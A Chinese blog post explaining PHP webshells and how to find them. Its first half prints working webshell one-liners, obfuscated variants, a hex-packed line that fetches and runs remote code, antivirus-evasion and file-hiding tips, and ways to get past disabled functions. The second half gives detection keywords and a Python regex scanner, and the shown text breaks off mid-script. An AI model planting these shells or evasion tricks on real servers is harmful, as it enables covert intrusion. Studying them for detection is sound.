PHP安全之webshell和后门检测

威龙小牛 發表於 2019-5-6 22:01:00

<h3>一、各种webshell</h3>
<p>一句话木马，其形式如下所示：</p>
<div class="cnblogs_Highlighter sh-gutter">
<div id="highlighter_945714" class="syntaxhighlighterbash">
<div class="line number1 index0 alt2"><code class="bash plain"><?php</code></div>
<div class="line number2 index1 alt1"><code class="bash keyword">if</code><code class="bash plain">(isset($_REQUEST[</code><code class="bash string">'cmd'</code><code class="bash plain">])){</code></div>
<div class="line number3 index2 alt2"><code class="bash spaces">    </code><code class="bash plain">$cmd = ($_REQUEST[</code><code class="bash string">"cmd"</code><code class="bash plain">]);</code></div>
<div class="line number4 index3 alt1"><code class="bash spaces">    </code><code class="bash plain">system($cmd);</code></div>
<div class="line number5 index4 alt2"><code class="bash spaces">    </code><code class="bash functions">echo</code> <code class="bash string">"</pre>$cmd<pre>"</code><code class="bash plain">;</code></div>
<div class="line number6 index5 alt1"><code class="bash spaces">    </code><code class="bash plain">die;</code></div>
<div class="line number7 index6 alt2"><code class="bash plain">}</code></div>
<div class="line number8 index7 alt1"><code class="bash plain">?></code></div>
</div>
</div>
<p>这种容易被安全软件检测出来。为了增强隐蔽性，出现了各种一句话木马的变形，通过各种函数来伪装，<strong>这里不得不吐槽PHP弱类型对于安全来说是致命的</strong></p>
<h4>a、使用str_replace函数</h4>
<div class="cnblogs_Highlighter sh-gutter">
<div id="highlighter_6319" class="syntaxhighlighterbash">
<div class="line number1 index0 alt2">
<div class="line number1 index0 alt2"><code class="bash plain"><?php $a =str_replace(x,</code><code class="bash string">""</code><code class="bash plain">,</code><code class="bash string">"axsxxsxexrxxt"</code><code class="bash plain">);$a($_POST[</code><code class="bash string">"code"</code><code class="bash plain">]); ?></code></div>
<div class="line number2 index1 alt1"> </div>
<div class="line number3 index2 alt2"><code class="bash plain">//</code><code class="bash plain">说明：请求参数  ?code=fputs(fopen(base64_decode(J2MucGhwJw==),w),base64_decode(</code><code class="bash string">"PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg=="</code><code class="bash plain">))</code></div>
<div class="line number4 index3 alt1"><code class="bash plain">最终执行命令<?php assert（fputs(fopen(</code><code class="bash string">'c.php'</code><code class="bash plain">,w),</code><code class="bash string">"<?php @eval($_POST);?>"</code><code class="bash plain">)）?></code></div>
</div>
</div>
</div>
<h4>b、使用str_rot13函数</h4>
<div class="cnblogs_Highlighter sh-gutter">
<div id="highlighter_845877" class="syntaxhighlighterbash">
<div class="line number1 index0 alt2"><code class="bash plain"><?php ($code = $_POST[</code><code class="bash string">'code'</code><code class="bash plain">]) && @preg_replace(</code><code class="bash string">'/ad/e'</code><code class="bash plain">,</code><code class="bash string">'@'</code><code class="bash plain">.str_rot13(</code><code class="bash string">'riny'</code><code class="bash plain">).</code><code class="bash string">'($code)'</code><code class="bash plain">, </code><code class="bash string">'add'</code><code class="bash plain">); ?></code></div>
<div class="line number2 index1 alt1"><code class="bash plain">//</code><code class="bash plain">说明：首先，将</code><code class="bash functions">eval</code><code class="bash plain">函数用str_rot13(</code><code class="bash string">'riny'</code><code class="bash plain">)隐藏。然后，利用 e 修饰符，在preg_replace完成字符串替换后，使得引擎将结果字符串作为php代码使用</code><code class="bash functions">eval</code><code class="bash plain">方式进行评估并将返回值作为最终参与替换的字符串。</code></div>
</div>
</div>
<h4>c、使用include函数</h4>
<div class="cnblogs_Highlighter sh-gutter">
<div id="highlighter_139626" class="syntaxhighlighterbash">
<div class="line number1 index0 alt2"><code class="bash plain"><?php $filename=$_GET[</code><code class="bash string">'code'</code><code class="bash plain">];include ($filename); ?></code></div>
<div class="line number2 index1 alt1"> </div>
<div class="line number3 index2 alt2"><code class="bash plain">//</code><code class="bash plain">由于include方法可以直接编译任何格式的文件为php格式运行，因此可以上传一个txt格式的php文件，将真正的后门写在文本当中。</code></div>
</div>
</div>
<h4>d、使用pack函数</h4>
<div class="cnblogs_Highlighter sh-gutter">
<div id="highlighter_243557" class="syntaxhighlighterbash">
<div class="line number1 index0 alt2"><code class="bash plain"><?php </code><code class="bash keyword">if</code><code class="bash plain">(empty($_SESSION[</code><code class="bash string">'api'</code><code class="bash plain">]))</code></div>
<div class="line number2 index1 alt1"><code class="bash spaces">    </code><code class="bash plain">$_SESSION[</code><code class="bash string">'api'</code><code class="bash plain">]=substr(file_get_contents(sprintf(</code><code class="bash string">'%s?  %s'</code><code class="bash plain">,pack(“H*”,'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);</code></div>
<div class="line number3 index2 alt2"><code class="bash spaces">    </code><code class="bash plain">@preg_replace(“~(.*)~ies”,gzuncompress($_SESSION[</code><code class="bash string">'api'</code><code class="bash plain">]),null);</code></div>
<div class="line number4 index3 alt1"><code class="bash plain">?></code></div>
</div>
</div>
<h3>e、使用session</h3>
<div class="cnblogs_Highlighter sh-gutter">
<div id="highlighter_498428" class="syntaxhighlighterbash">
<div class="line number1 index0 alt2"><code class="bash plain"><?php</code></div>
<div class="line number2 index1 alt1"><code class="bash plain">session_start();</code></div>
<div class="line number3 index2 alt2"><code class="bash plain">$_POST[</code><code class="bash string">'code'</code><code class="bash plain">] && $_SESSION[</code><code class="bash string">'theCode'</code><code class="bash plain">] = trim($_POST[</code><code class="bash string">'code'</code><code class="bash plain">]);</code></div>
<div class="line number4 index3 alt1"><code class="bash plain">$_SESSION[</code><code class="bash string">'theCode'</code><code class="bash plain">]&&preg_replace(</code><code class="bash string">'\'a\'eis'</code><code class="bash plain">,</code><code class="bash string">'e'</code><code class="bash plain">.</code><code class="bash string">'v'</code><code class="bash plain">.</code><code class="bash string">'a'</code><code class="bash plain">.</code><code class="bash string">'l'</code><code class="bash plain">.</code><code class="bash string">'(base64_decode($_SESSION[\'theCode\']))'</code><code class="bash plain">,</code><code class="bash string">'a'</code><code class="bash plain">);</code></div>
</div>
</div>
<h4>f、隐藏在html页面</h4>
<div class="cnblogs_Highlighter sh-gutter">
<div id="highlighter_389536" class="syntaxhighlighterbash">
<div class="line number1 index0 alt2"><code class="bash plain"><!DOCTYPE HTML PUBLIC </code><code class="bash string">"-//IETF//DTD HTML 2.0//EN"</code><code class="bash plain">></code></div>
<div class="line number2 index1 alt1"><code class="bash plain"><html><</code><code class="bash functions">head</code><code class="bash plain">></code></div>
<div class="line number3 index2 alt2"><code class="bash plain"><title>404 Not Found<</code><code class="bash plain">/title</code><code class="bash plain">></code></div>
<div class="line number4 index3 alt1"><code class="bash plain"><</code><code class="bash plain">/head</code><code class="bash plain">><body></code></div>
<div class="line number5 index4 alt2"><code class="bash plain"><h1>Not Found<</code><code class="bash plain">/h1</code><code class="bash plain">></code></div>
<div class="line number6 index5 alt1"><code class="bash plain"><p>The requested URL was not found on this server.<</code><code class="bash plain">/p</code><code class="bash plain">></code></div>
<div class="line number7 index6 alt2"><code class="bash plain"><</code><code class="bash plain">/body</code><code class="bash plain">><</code><code class="bash plain">/html</code><code class="bash plain">></code></div>
<div class="line number8 index7 alt1"><code class="bash plain"><?php</code></div>
<div class="line number9 index8 alt2"><code class="bash plain">@preg_replace(</code><code class="bash string">"//e"</code><code class="bash plain">,$_POST[</code><code class="bash string">'error'</code><code class="bash plain">],</code><code class="bash string">"saft"</code><code class="bash plain">);</code></div>
<div class="line number10 index9 alt1"><code class="bash plain">header(</code><code class="bash string">'HTTP/1.1 404 Not Found'</code><code class="bash plain">);</code></div>
<div class="line number11 index10 alt2"><code class="bash plain">?></code></div>
</div>
</div>
<h4>g、使用assert函数</h4>
<div class="cnblogs_Highlighter sh-gutter">
<div id="highlighter_397601" class="syntaxhighlighterbash"><?php assert($_POST);?></div>
</div>
<h4>或者</h4>
<div class="cnblogs_Highlighter sh-gutter">
<div id="highlighter_994631" class="syntaxhighlightercsharp">
<div class="line number1 index0 alt2"><code class="csharp plain"><?php</code></div>
<div class="line number2 index1 alt1"><code class="csharp plain">$item[</code><code class="csharp string">'wind'</code><code class="csharp plain">] = </code><code class="csharp string">'assert'</code><code class="csharp plain">;</code></div>
<div class="line number3 index2 alt2"><code class="csharp plain">$array[] = $item;</code></div>
<div class="line number4 index3 alt1"><code class="csharp plain">$array[</code><code class="csharp string">'wind'</code><code class="csharp plain">]($_POST[</code><code class="csharp string">'iixosmse'</code><code class="csharp plain">]);</code></div>
</div>
</div>
<h4>h、使用copy函数复制文件</h4>
<div class="cnblogs_Highlighter sh-gutter">
<div id="highlighter_678718" class="syntaxhighlighterbash">
<div class="line number1 index0 alt2"><code class="bash plain"><?php</code></div>
<div class="line number2 index1 alt1"><code class="bash plain">$reg=</code><code class="bash string">"c"</code><code class="bash plain">.</code><code class="bash string">"o"</code><code class="bash plain">.</code><code class="bash string">"p"</code><code class="bash plain">.</code><code class="bash string">"y"</code><code class="bash plain">;</code></div>
<div class="line number3 index2 alt2"><code class="bash plain">$reg($_FILES,$_FILES);</code></div>
</div>
</div>
<h3>二、代码混淆</h3>
<div class="cnblogs_Highlighter sh-gutter">
<div id="highlighter_195591" class="syntaxhighlighterbash">
<div class="line number1 index0 alt2"><code class="bash plain"><?php </code></div>
<div class="line number2 index1 alt1"><code class="bash plain">@$_++; </code><code class="bash plain">//</code> <code class="bash plain">$_ = 1 </code></div>
<div class="line number3 index2 alt2"><code class="bash plain">$__=(</code><code class="bash string">"#"</code><code class="bash plain">^</code><code class="bash string">"|"</code><code class="bash plain">); </code><code class="bash plain">//</code> <code class="bash plain">$__ = _ </code></div>
<div class="line number4 index3 alt1"><code class="bash plain">$__.=(</code><code class="bash string">"."</code><code class="bash plain">^</code><code class="bash string">"~"</code><code class="bash plain">); </code><code class="bash plain">//</code> <code class="bash plain">_P </code></div>
<div class="line number5 index4 alt2"><code class="bash plain">$__.=(</code><code class="bash string">"/"</code><code class="bash plain">^</code><code class="bash string">"`"</code><code class="bash plain">); </code><code class="bash plain">//</code> <code class="bash plain">_PO </code></div>
<div class="line number6 index5 alt1"><code class="bash plain">$__.=(</code><code class="bash string">"|"</code><code class="bash plain">^</code><code class="bash string">"/"</code><code class="bash plain">); </code><code class="bash plain">//</code> <code class="bash plain">_POS </code></div>
<div class="line number7 index6 alt2"><code class="bash plain">$__.=(</code><code class="bash string">"{"</code><code class="bash plain">^</code><code class="bash string">"/"</code><code class="bash plain">); </code><code class="bash plain">//</code> <code class="bash plain">_POST </code></div>
<div class="line number8 index7 alt1"><code class="bash plain">${$__}[!$_](${$__}[$_]); </code><code class="bash plain">//</code> <code class="bash plain">$_POST($_POST); </code></div>
<div class="line number9 index8 alt2"><code class="bash plain">?></code></div>
</div>
</div>
<p>或者</p>
<div class="cnblogs_Highlighter sh-gutter">
<div id="highlighter_920324" class="syntaxhighlighterbash">
<div class="line number1 index0 alt2"><code class="bash plain"><?php </code></div>
<div class="line number2 index1 alt1"><code class="bash spaces">    </code><code class="bash plain">$penh=</code><code class="bash string">"sIGpvaW4oYXJyYgiXlfc2xpY2UoJGEsgiJGMoJGEpLTgiMpKSkpgiKTtlY2hvICc8LycgiuJgiGsugiJz4nO30="</code><code class="bash plain">; </code></div>
<div class="line number3 index2 alt2"><code class="bash spaces">    </code><code class="bash plain">$kthe=</code><code class="bash string">"JGEpPjgiMpeyRrPSgidwcyc7ZWNobyAnPCcgiugiJGsuJz4nOgi2V2YWwoYgimFzZTY0X2giRlY2gi9kgiZShwcmVn"</code><code class="bash plain">; </code></div>
<div class="line number4 index3 alt1"><code class="bash spaces">    </code><code class="bash plain">$ftdf = str_replace(</code><code class="bash string">"w"</code><code class="bash plain">,</code><code class="bash string">""</code><code class="bash plain">,</code><code class="bash string">"stwrw_wrwepwlwawcwe"</code><code class="bash plain">); </code></div>
<div class="line number5 index4 alt2"><code class="bash spaces">    </code><code class="bash plain">$wmmi=</code><code class="bash string">"X3JlcgiGxhY2UgioYXgiJyYXkoJy9bXlx3PVgixzXS8nLCgicvXHMvJyksIGFycmF5KCcnLCcrgiJyk"</code><code class="bash plain">; </code></div>
<div class="line number6 index5 alt1"><code class="bash spaces">    </code><code class="bash plain">$zrmt=</code><code class="bash string">"JGM9J2NvdWgi50JzskgiYT0gikX0NgiPT0tJRgiTtpZihyZXNldCgkYSk9PSgidvbycggiJgiiYgJGMo"</code><code class="bash plain">; </code></div>
<div class="line number7 index6 alt2"><code class="bash spaces">    </code><code class="bash plain">$smgv = $ftdf(</code><code class="bash string">"f"</code><code class="bash plain">, </code><code class="bash string">""</code><code class="bash plain">, </code><code class="bash string">"bfafsfef6f4_fdfefcodfe"</code><code class="bash plain">); </code></div>
<div class="line number8 index7 alt1"><code class="bash spaces">    </code><code class="bash plain">$jgfi = $ftdf(</code><code class="bash string">"l"</code><code class="bash plain">,</code><code class="bash string">""</code><code class="bash plain">,</code><code class="bash string">"lclrlelaltel_functlilon"</code><code class="bash plain">); </code></div>
<div class="line number9 index8 alt2"><code class="bash spaces">    </code><code class="bash plain">$rdwm = $jgfi(</code><code class="bash string">''</code><code class="bash plain">, $smgv($ftdf(</code><code class="bash string">"gi"</code><code class="bash plain">, </code><code class="bash string">""</code><code class="bash plain">, $zrmt.$kthe.$wmmi.$penh))); $rdwm(); </code></div>
<div class="line number10 index9 alt1"><code class="bash plain">?></code></div>
</div>
</div>
<p>可以使用weevely工具来生成，代码伪装避开各种主流的杀毒软件</p>
<blockquote>
<p>PHP后门生成工具weevely</p>
<p>weevely是一款针对PHP的webshell的自由软件，可用于模拟一个类似于telnet的连接shell，weevely通常用于web程序的漏洞利用，隐藏后门或者使用类似telnet的方式来代替web 页面式的管理，weevely生成的服务器端php代码是经过了base64编码的，所以可以骗过主流的杀毒软件和IDS，上传服务器端代码后通常可以通过weevely直接运行。</p>
<p>weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术，后门中所使用的函数均是常用的字符串处理函数，被作为检查规则的eval，system等函数都不会直接出现在代码中，从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具进行扫描，结果显示该文件无任何威胁。</p>
</blockquote>
<p>更常用的混淆视听的方法:（这种是服务器层面的混淆）</p>
<ul>
<li>
<p>修改文件时间</p>
</li>
<li>
<p>改名融入上传后所在文件夹，让人无法直观看出文件异常</p>
</li>
<li>
<p>文件大小的伪装处理(至少看起大小像个正常脚本)</p>
</li>
<li>
<p>选好藏身路径并尽量少的访问</p>
</li>
<li>
<p>畸形目录%20</p>
</li>
</ul>
<h3>三、如果绕过配置文件</h3>
<p>一般的服务器管理员会把 system、exec等危险函数禁用的，那么如何绕过呢？</p>
<h3>1、使用反射</h3>
<p>相关内容可参考：http://cn2.php.net/manual/en/reflectionfunction.invokeargs.php。</p>
<div class="cnblogs_code">
<pre><?<span style="color: rgba(0, 0, 0, 1)">php
</span><span style="color: rgba(128, 0, 128, 1)">$func</span> = <span style="color: rgba(0, 0, 255, 1)">new</span> ReflectionFunction("system"<span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$func</span>->invokeArgs(<span style="color: rgba(0, 0, 255, 1)">array</span>("<span style="color: rgba(128, 0, 128, 1)">$_GET</span>"<span style="color: rgba(0, 0, 0, 1)">));
</span>?></pre>
</div>
<p> </p>
<h4>2、使用callback</h4>
<p>php提供的另外一种可间接调用函数的方法是callback. 这里使用了ob_start.具体说明可参考：http://www.php.net/manual/en/function.ob-start.php</p>
<div class="cnblogs_Highlighter sh-gutter">
<div id="highlighter_923031" class="syntaxhighlighterbash">
<div class="line number1 index0 alt2"><code class="bash plain"><?php</code></div>
<div class="line number2 index1 alt1"><code class="bash plain">$cb= </code><code class="bash string">'system'</code><code class="bash plain">;</code></div>
<div class="line number3 index2 alt2"><code class="bash plain">ob_start($cb);</code></div>
<div class="line number4 index3 alt1"><code class="bash functions">echo</code> <code class="bash plain">$_GET;</code></div>
<div class="line number5 index4 alt2"><code class="bash plain">ob_end_flush();</code></div>
<div class="line number6 index5 alt1"><code class="bash plain">?></code></div>
</div>
</div>
<p>php中支持callback的函数还有很多，比如 array_map,array_filter, array_reduce,usort(),uksort(),array_walk() 等</p>
<p> </p>
<h3>四、安全人员应该怎么做</h3>
<h3>1、如何查找</h3>
<p>直观寻找方式也有很多</p>
<ul>
<li>
<p>通过文件名/修改时间/大小，文件备份比对发现异常（SVN/Git对比，查看文件是否被修改）</p>
</li>
<li>
<p>通过WEBSHELL后门扫描脚本发现，如Scanbackdoor.php/Pecker/shelldetect.php/（zhujiweishi ）</p>
</li>
<li>
<p>通过access.log访问日志分析</p>
</li>
</ul>
<p>下面是360 zhujiweishi ，在linux服务器上非常简单好用</p>
<p>通过常见的关键词如（可以使用find 和 grep 等命令结合起来搜索代码中是否包含以下文件）</p>
<ul>
<li>
<p>系统命令执行: system, passthru, shell_exec, exec, popen, proc_open</p>
</li>
<li>
<p>代码执行: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13</p>
</li>
<li>
<p>文件包含: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite</p>
</li>
</ul>
<p>通过简单的python脚本</p>
<div class="cnblogs_Highlighter sh-gutter">
<div id="highlighter_708932" class="syntaxhighlighterpython">
<div class="line number1 index0 alt2"><code class="python comments">#!/usr/bin/env python</code></div>
<div class="line number2 index1 alt1"><code class="python comments"># encoding: utf-8</code></div>
<div class="line number3 index2 alt2"><code class="python spaces"> </code> </div>
<div class="line number4 index3 alt1"><code class="python keyword">import</code> <code class="python plain">os,sys</code></div>
<div class="line number5 index4 alt2"><code class="python keyword">import</code> <code class="python plain">re</code></div>
<div class="line number6 index5 alt1"><code class="python keyword">import</code> <code class="python plain">hashlib</code></div>
<div class="line number7 index6 alt2"><code class="python keyword">import</code> <code class="python plain">time</code></div>
<div class="line number8 index7 alt1"><code class="python spaces"> </code> </div>
<div class="line number9 index8 alt2"><code class="python plain">rulelist </code><code class="python keyword">=</code> <code class="python plain">[</code></div>
<div class="line number10 index9 alt1"><code class="python spaces">    </code><code class="python string">'(\$_(GET|POST|REQUEST)\[.{0,15}\]\s{0,10}$\s{0,10}\$_(GET|POST|REQUEST)\[.{0,15}\]$)'</code><code class="python plain">,</code></div>
<div class="line number11 index10 alt2"><code class="python spaces">    </code><code class="python string">'((eval|assert)(\s|\n)*$(\s|\n)*\$_(POST|GET|REQUEST)\[.{0,15}\]$)'</code><code class="python plain">,</code></div>
<div class="line number12 index11 alt1"><code class="python spaces">    </code><code class="python string">'(eval(\s|\n)*$base64_decode(\s|\n)*\((.|\n){1,200})'</code><code class="python plain">,</code></div>
<div class="line number13 index12 alt2"><code class="python spaces">    </code><code class="python string">'(function\_exists\s*\(\s*[\'|\"](popen|exec|proc\_open|passthru)+[\'|\"]\s*$)'</code><code class="python plain">,</code></div>
<div class="line number14 index13 alt1"><code class="python spaces">    </code><code class="python string">'((exec|shell\_exec|passthru)+\s*$\s*\$\_(\w+)\[(.*)\]\s*$)'</code><code class="python plain">,</code></div>
<div class="line number15 index14 alt2"><code class="python spaces">    </code><code class="python string">'(\$(\w+)\s*$\s.chr\(\d+$\))'</code><code class="python plain">,</code></div>
<div class="line number16 index15 alt1"><code class="python spaces">    </code><code class="python string">'(\$(\w+)\s*\$\{(.*)\})'</code><code class="python plain">,</code></div>
<div class="line number17 index16 alt2"><code class="python spaces">    </code><code class="python string">'(\$(\w+)\s*$\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\s*$)'</code><code class="python plain">,</code></div>
<div class="line number18 index17 alt1"><code class="python spaces">    </code><code class="python string">'(\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]$\s*\$(.*)$)'</code><code class="python plain">,</code></div>
<div class="line number19 index18 alt2"><code class="python spaces">    </code><code class="python string">'(\$\_\=(.*)\$\_)'</code><code class="python plain">,</code></div>
<div class="line number20 index19 alt1"><code class="python spaces">    </code><code class="python string">'(\$(.*)\s*$(.*)\/e(.*)\,\s*\$\_(.*)\,(.*)$)'</code><code class="python plain">,</code></div>
<div class="line number21 index20 alt2"><code class="python spaces">    </code><code class="python string">'(new com\s*$\s*[\'|\"]shell(.*)[\'|\"]\s*$)'</code><code class="python plain">,</code></div>
<div class="line number22 index21 alt1"><code class="python spaces">    </code><code class="python string">'(echo\s*curl\_exec\s*$\s*\$(\w+)\s*$)'</code><code class="python plain">,</code></div>
<div class="line number23 index22 alt2"><code class="python spaces">    </code><code class="python string">'((fopen|fwrite|fputs|file\_put\_contents)+\s*$(.*)\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\](.*)$)'</code><code class="python plain">,</code></div>
<div class="line number24 index23 alt1"><code class="python spaces">    </code><code class="python string">'($\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\,\s*\$\_(GET|POST|REQUEST|FILES)+\[(.*)\]\[(.*)\]\s*$)'</code><code class="python plain">,</code></div>
<div class="line number25 index24 alt2"><code class="python spaces">    </code><code class="python string">'(\$\_(\w+)(.*)(eval|assert|include|require|include\_once|require\_once)+\s*$\s*\$(\w+)\s*$)'</code><code class="python plain">,</code></div>
<div class="line number26 index25 alt1"><code class="python spaces">    </code><code class="python string">'((include|require|include\_once|require\_once)+\s*$\s*[\'|\"](\w+)\.(jpg|gif|ico|bmp|png|txt|zip|rar|htm|css|js)+[\'|\"]\s*$)'</code><code class="python plain">,</code></div>
<div class="line number27 index26 alt2"><code class="python spaces">    </code><code class="python string">'(eval\s*$\s*\(\s*\$\$(\w+))'</code><code class="python plain">,</code></div>
<div class="line number28 index27 alt1"><code class="python spaces">    </code><code class="python string">'((eval|assert|include|require|include\_once|require\_once|array\_map|array\_walk)+\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*$)'</code><code class="python plain">,</code></div>
<div class="line number29 index28 alt2"><code class="python spaces">    </code><code class="python string">'(preg\_replace\s*\((.*)\(base64\_decode\(\$)'</code></div>
<div class="line number30 index29 alt1"><code class="python spaces">    </code><code class="python plain">]</code></div>
<div class="line number31 index30 alt2"><code class="python spaces"> </code> </div>
<div class="line number32 index31 alt1"><code class="python keyword">def</code> <code class="python plain">scan(path):</code></div>
<div class="line number33 index32 alt2"><code class="python spaces">    </code><code class="python functions">print</code><code class="python plain">(</code><code class="python string">'           可疑文件         '</code><code class="python plain">)</code></div>
<div class="line number34 index33 alt1"><code class="python spaces">    </code><code class="python functions">print</code><code class="python plain">(</code><code class="python string">'*'</code><code class="python keyword">*</code><code class="python value">30</code><code class="python plain">)</code></div>
<div class="line number35 index34 alt2"><code class="python spaces">    </code><code class="python keyword">for</code> <code class="python plain">root,dirs,files </code><code class="python keyword">in</code> <code class="python plain">os.walk(path):</code></div>
<div class="line number36 index35 alt1"><code class="python spaces">        </code><code class="python keyword">for</code> <code class="python plain">filespath </code><code class="python keyword">in</code> <code class="python plain">files:</code></div>
<div class="line number37 index36 alt2"><code class="python spaces">            </code><code class="python keyword">if</code> <code class="python plain">os.path.getsize(os.path.join(root,filespath))<</code><code class="python value">1024000</code><code class="python plain">:</code></div>
<div class="line number38 index37 alt1"><code class="python spaces">                </code><code class="python functions">file</code><code class="python keyword">=</code> <code class="python functions">open</code><code class="python plain">(os.path.join(root,filespath))</code></div>
<div class="line number39 index38 alt2"><code class="python spaces">                </code><code class="python plain">filestr </code><code class="python keyword">=</code> <code class="python functions">file</code><code class="python plain">.read()</code></div>
<div class="line number40 index39 alt1"><code class="python spaces">                </code><code class="python functions">file</code><code class="python plain">.close()</code></div>
<div class="line number41 index40 alt2"><code class="python spaces">                </code><code class="python keyword">for</code> <code class="python plain">rule </code><code class="python keyword">in</code> <code class="python plain">rulelist:</code></div>
<div class="line number42 index41 alt1"><code class="python spaces">                    </code><code class="python plain">result </code><code class="python keyword">=</code> <code class="python plain">re.</code><code class="python functions">compile</code><code class="python plain">(rule).findall(filestr)</code></div>
<div class="line number43 index42 alt2"><code class="python spaces">                    </code><code class="python keyword">if</code> <code class="python plain">result:</code></div>
<div class="line number44 index43 alt1"><code class="python spaces">                        </code><code class="python functions">print</code> <code class="python string">'文件:'</code><code class="python keyword">+</code><code class="python plain">os.path.join(root,filespath )</code></div>
<div class="line number45 index44 alt2"><code class="python spaces">                        </code><code class="python functions">print</code> <code class="python string">'恶意代码:'</code><code class="python keyword">+</code><code class="python functions">str</code><code class="python plain">(result[</code><code class="python value">0</code><code class="python plain">][</code><code class="python value">0</code><code class="python plain">:</code><code class="python value">200</code><code class="python plain">])</code></div>
<div class="line number46 index45 alt1"><code class="python spaces">                        </code><code class="python functions">print</code> <code class="python plain">(</code><code class="python string">'最后修改时间:'</code><code class="python keyword">+</code><code class="python plain">time.strftime(</code><code class="python string">'%Y-%m-%d %H:%M:%S'</code><code class="python plain">,time.localtime(os.path.getmtime(os.path.join(root,filespath)))))</code></div>
<div class="line number47 index46 alt2"><code class="python spaces">                        </code><code class="python functions">print</code> <code class="python string">'\n\n'</code></div>
<div class="line number48 index47 alt1"><code class="python spaces">                        </code><code class="python keyword">break</code></div>
<div class="line number49 index48 alt2"><code class="python keyword">def</code> <code class="python plain">md5sum(md5_file):</code></div>
<div class="line number50 index49 alt1"><code class="python spaces">    </code><code class="python plain">m </code><code class="python keyword">=</code> <code class="python plain">hashlib.md5()</code></div>
<div class="line number51 index50 alt2"><code class="python spaces">    </code><code class="python plain">fp </code><code class="python keyword">=</code> <code class="python functions">open</code><code class="python plain">(md5_file)</code></div>
<div class="line number52 index51 alt1"><code class="python spaces">    </code><code class="python plain">m.update(fp.read())</code></div>
<div class="line number53 index52 alt2"><code class="python spaces">    </code><code class="python keyword">return</code> <code class="python plain">m.hexdigest()</code></div>
<div class="line number54 index53 alt1"><code class="python spaces">    </code><code class="python plain">fp.close()</code></div>
<div class="line number55 index54 alt2"><code class="python spaces"> </code> </div>
<div class="line number56 index55 alt1"><code class="python keyword">if</code> <code class="python plain">md5sum(</code><code class="python string">'/etc/issue'</code><code class="python plain">) </code><code class="python keyword">=</code><code class="python keyword">=</code> <code class="python string">'3e3c7c4194b12af573ab11c16990c477'</code><code class="python plain">:</code></div>
<div class="line number57 index56 alt2"><code class="python spaces">    </code><code class="python keyword">if</code> <code class="python plain">md5sum(</code><code class="python string">'/usr/sbin/sshd'</code><code class="python plain">) </code><code class="python keyword">=</code><code class="python keyword">=</code> <code class="python string">'abf7a90c36705ef679298a44af80b10b'</code><code class="python plain">:</code></div>
<div class="line number58 index57 alt1"><code class="python spaces">        </code><code class="python keyword">pass</code></div>
<div class="line number59 index58 alt2"><code class="python spaces">    </code><code class="python keyword">else</code><code class="python plain">:</code></div>
<div class="line number60 index59 alt1"><code class="python spaces">        </code><code class="python functions">print</code><code class="python plain">(</code><code class="python string">'*'</code><code class="python keyword">*</code><code class="python value">40</code><code class="python plain">)</code></div>
<div class="line number61 index60 alt2"><code class="python spaces">        </code><code class="python functions">print</code> <code class="python string">"\033[31m sshd被修改，疑似留有后门\033[m"</code></div>
<div class="line number62 index61 alt1"><code class="python spaces">        </code><code class="python functions">print</code><code class="python plain">(</code><code class="python string">'*'</code><code class="python keyword">*</code><code class="python value">40</code><code class="python plain">)</code></div>
<div class="line number63 index62 alt2"><code class="python spaces">        </code><code class="python plain">time.sleep(</code><code class="python value">5</code><code class="python plain">)</code></div>
<div class="line number64 index63 alt1"><code class="python keyword">if</code> <code class="python plain">md5sum(</code><code class="python string">'/etc/issue'</code><code class="python plain">) </code><code class="python keyword">=</code><code class="python keyword">=</code> <code class="python string">'6c9222ee501323045d85545853ebea55'</code><code class="python plain">:</code></div>
<div class="line number65 index64 alt2"><code class="python spaces">    </code><code class="python keyword">if</code> <code class="python plain">md5sum(</code><code class="python string">'/usr/sbin/sshd'</code><code class="python plain">) </code><code class="python keyword">=</code><code class="python keyword">=</code> <code class="python string">'4bbf2b12d6b7f234fa01b23dc9822838'</code><code class="python plain">:</code></div>
<div class="line number66 index65 alt1"><code class="python spaces">        </code><code class="python keyword">pass</code></div>
<div class="line number67 index66 alt2"><code class="python spaces">    </code><code class="python keyword">else</code><code class="python plain">:</code></div>
<div class="line number68 index67 alt1"><code class="python spaces">        </code><code class="python functions">print</code><code class="python plain">(</code><code class="python string">'*'</code><code class="python keyword">*</code><code class="python value">40</code><code class="python plain">)</code></div>
<div class="line number69 index68 alt2"><code class="python spaces">        </code><code class="python functions">print</code> <code class="python string">"\033[31m sshd被修改，疑似留有后门\033[m"</code></div>
<div class="line number70 index69 alt1"><code class="python spaces">        </code><code class="python functions">print</code><code class="python plain">(</code><code class="python string">'*'</code><code class="python keyword">*</code><code class="python value">40</code><code class="python plain">)</code></div>
<div class="line number71 index70 alt2"><code class="python spaces">        </code><code class="python plain">time.sleep(</code><code class="python value">5</code><code class="python plain">)</code></div>
<div class="line number72 index71 alt1"><code class="python keyword">if</code> <code class="python plain">__name__</code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python string">'__main__'</code><code class="python plain">:</code></div>
<div class="line number73 index72 alt2"><code class="python spaces"> </code> </div>
<div class="line number74 index73 alt1"><code class="python spaces">    </code><code class="python keyword">if</code> <code class="python functions">len</code><code class="python plain">(sys.argv)!</code><code class="python keyword">=</code><code class="python value">2</code><code class="python plain">:</code></div>
<div class="line number75 index74 alt2"><code class="python spaces">        </code><code class="python functions">print</code> <code class="python string">'参数错误'</code></div>
<div class="line number76 index75 alt1"><code class="python spaces">        </code><code class="python functions">print</code> <code class="python string">"\t按恶意代码查找:"</code><code class="python keyword">+</code><code class="python plain">sys.argv[</code><code class="python value">0</code><code class="python plain">]</code><code class="python keyword">+</code><code class="python string">'目录名'</code></div>
